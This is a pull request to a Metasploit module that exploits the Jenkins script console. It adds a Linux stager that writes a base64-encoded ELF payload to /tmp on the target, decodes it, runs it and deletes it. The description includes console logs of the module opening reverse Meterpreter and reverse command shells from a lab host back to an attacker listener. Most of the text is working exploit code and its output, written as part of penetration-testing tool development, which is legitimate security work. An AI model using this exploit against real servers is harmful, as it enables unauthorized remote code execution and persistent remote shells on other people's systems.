### PR TITLE
Added target for linux stager

### DIFF
--- a/modules/exploits/multi/http/jenkins_script_console.rb
+++ b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::CmdStagerVBS
+	include Msf::Exploit::FileDropper
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -36,8 +37,9 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'Targets'		=>
 				[
-					['Windows',  {'Arch' => ARCH_X86, 'Platform' => 'win'}],
-					['Unix',     {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}],
+					['Windows',  {'Arch'  => ARCH_X86, 'Platform' => 'win'}],
+					['Linux',    { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
+					['Unix CMD', {'Arch'  => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}]
 				],
 			'DisclosureDate' => 'Jan 18 2013',
 			'DefaultTarget'  => 0))
@@ -46,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			[
 				OptString.new('USERNAME',  [ false, 'The username to authenticate as', '' ]),
 				OptString.new('PASSWORD',  [ false, 'The password for the specified username', '' ]),
-				OptString.new('TARGETURI', [ true, 'The path to jenkins', '/jenkins/' ]),
+				OptString.new('TARGETURI', [ true,  'The path to jenkins', '/jenkins/' ]),
 			], self.class)
 	end
 
@@ -59,6 +61,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			return Exploit::CheckCode::Detected
 		else
 			return Exploit::CheckCode::Safe
+		end
+	end
+
+	def on_new_session(client)
+		if not @to_delete.nil?
+			print_warning("Deleting #{@to_delete} payload file")
+			execute_command("rm #{@to_delete}")
 		end
 	end
 
@@ -100,8 +109,34 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def execute_command(cmd, opts = {})
+		vprint_status("Attempting to execute: #{cmd}")
 		http_send_command("#{cmd}")
 	end
+
+	def linux_stager
+		cmds = "echo LINE | tee FILE"
+		exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
+		base64 = Rex::Text.encode_base64(exe)
+		base64.gsub!(/\=/, "\\u003d")
+		file = rand_text_alphanumeric(4+rand(4))
+
+		execute_command("touch /tmp/#{file}.b64")
+		cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
+		base64.each_line do |line|
+			line.chomp!
+			cmd = cmds
+			cmd.gsub!(/LINE/, line)
+			execute_command(cmds)
+		end
+
+		execute_command("base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
+		execute_command("chmod +x /tmp/#{file}")
+		execute_command("rm /tmp/#{file}.b64")
+
+		execute_command("/tmp/#{file}")
+		@to_delete = "/tmp/#{file}"
+	end
+
 
 	def exploit
 		@uri = target_uri
@@ -138,10 +173,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		when 'win'
 			print_status("#{rhost}:#{rport} - Sending VBS stager...")
 			execute_cmdstager({:linemax => 2049})
-
 		when 'unix'
 			print_status("#{rhost}:#{rport} - Sending payload...")
 			http_send_command("#{payload.encoded}")
+		when 'linux'
+			print_status("#{rhost}:#{rport} - Sending Linux stager...")
+			linux_stager
 		end
 
 		handler


### PR DESCRIPTION
Hi @zeroSteiner, 

I've added a new target for linux staging so native meterpreter can be executed. The Unix CMD target remains because it's always useful. CMD payloads are fine and the staging can fail in some targets! If you agree with the code, please land this pull request into your branch, and the original pull request ( https://github.com/rapid7/metasploit-framework/pull/1338 ) to the msf repo will be automatically updated!
- Staging working

```
msf  exploit(jenkins_script_console) > show options

Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    no        The password for the specified username
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.154    yes       The target address
   RPORT      8080             yes       The target port
   TARGETURI  /                yes       The path to jenkins
   USERNAME                    no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LHOST         192.168.1.128    yes       The listen address
   LPORT         4444             yes       The listen port
   PrependFork                    no        Add a fork() / exit_group() (for parent) code


Exploit target:

   Id  Name
   --  ----
   1   Linux


msf  exploit(jenkins_script_console) > reload
[*] Reloading module...
msf  exploit(jenkins_script_console) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Checking access to the script console
[*] No authentication required, skipping login...
[*] 192.168.1.154:8080 - Sending Linux stager...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.1.154
[*] Meterpreter session 12 opened (192.168.1.128:4444 -> 192.168.1.154:46726) at 2013-01-20 13:37:06 +0100
[!] Deleting /tmp/IVVrDu payload file

meterpreter > sysinfo
Computer     : ubuntu
OS           : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.154 - Meterpreter session 12 closed.  Reason: User exit

```
- CMD payload too:

```
msf  exploit(jenkins_script_console) > set target 2
target => 2
msf  exploit(jenkins_script_console) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf  exploit(jenkins_script_console) > rexploit
[*] Reloading module...

[*] Checking access to the script console
[*] Started reverse double handler
[*] No authentication required, skipping login...
[*] 192.168.1.154:8080 - Sending payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo xKrJSZPrjD3TsbcS;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "xKrJSZPrjD3TsbcS\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 13 opened (192.168.1.128:4444 -> 192.168.1.154:46728) at 2013-01-20 13:37:30 +0100

id
uid=116(jenkins) gid=65534(nogroup) groups=65534(nogroup)
^C
Abort session 13? [y/N]  y

[*] 192.168.1.154 - Command shell session 13 closed.  Reason: User exit
msf  exploit(jenkins_script_console) > 

```
